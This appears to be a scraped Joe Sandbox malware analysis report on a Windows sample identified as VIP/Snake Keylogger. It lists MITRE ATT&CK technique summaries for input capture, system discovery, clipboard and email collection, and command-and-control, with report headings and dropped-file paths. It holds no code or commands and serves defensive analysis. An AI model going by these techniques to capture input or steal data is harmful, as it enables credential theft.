Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BgroUcYHpy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut5707.tmp

C:\Users\user\AppData\Local\Temp\nondefinition

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
BgroUcYHpy.exe

Function 00253B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 002549A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00254E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 002B9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 0025301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00253041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0025708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00253633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00253A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00253766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0025F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 0147DFC8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 002539D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 0147DD58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
fileCOMMON

Function 0025407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre